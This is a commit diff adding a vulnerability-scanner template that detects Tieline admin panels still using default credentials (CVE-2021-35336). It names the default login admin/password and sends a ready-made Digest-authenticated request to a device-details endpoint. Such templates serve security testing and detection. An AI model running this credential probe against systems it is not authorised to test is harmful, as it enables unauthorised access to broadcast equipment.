Merge pull request #2080 from pratikkhalane/master

Tieline Default Credentials - Create CVE-2021-35336
2021-08-05 00:05:48 +05:30 · 2021-08-05 00:05:48 +05:30 · 977ee39529
parent 41dfa0e69e 255fe969b5
commit 977ee39529
1 changed files with 39 additions and 0 deletions
--- a/default-logins/tieline/tieline.yaml
+++ b/default-logins/tieline/tieline.yaml
@ -0,0 +1,39 @@
+id: tieline-default-credentials
+
+info:
+  name: Tieline Default Credentials
+  author: Pratik Khalane
+  severity: high
+  description: Finding the Tieline Admin Panels with default credentials.
+  reference: https://pratikkhalane91.medium.com/use-of-default-credentials-to-unauthorised-remote-access-of-internal-panel-of-tieline-c1ffe3b3757c
+  tags: tieline,default-login
+
+#Payloads:
+#Username - admin
+#Password - password
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/get_device_details'
+    headers:
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+      Referer: '{{BaseURL}}/assets/base/home.html'
+      Authorization: 'Digest username="admin", realm="Bridge-IT", nonce="d24d09512ebc3e43c4f6faf34fdb8c76", uri="/api/get_device_details", response="d052e9299debc7bd9cb8adef0a83fed4", qop=auth, nc=00000001, cnonce="ae373d748855243d"'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<SERIAL>"
+          - "<VERSION>"
+        condition: and
+
+      - type: word
+        words:
+          - "text/xml"
+        part: header
+
+      - type: status
+        status:
+          - 200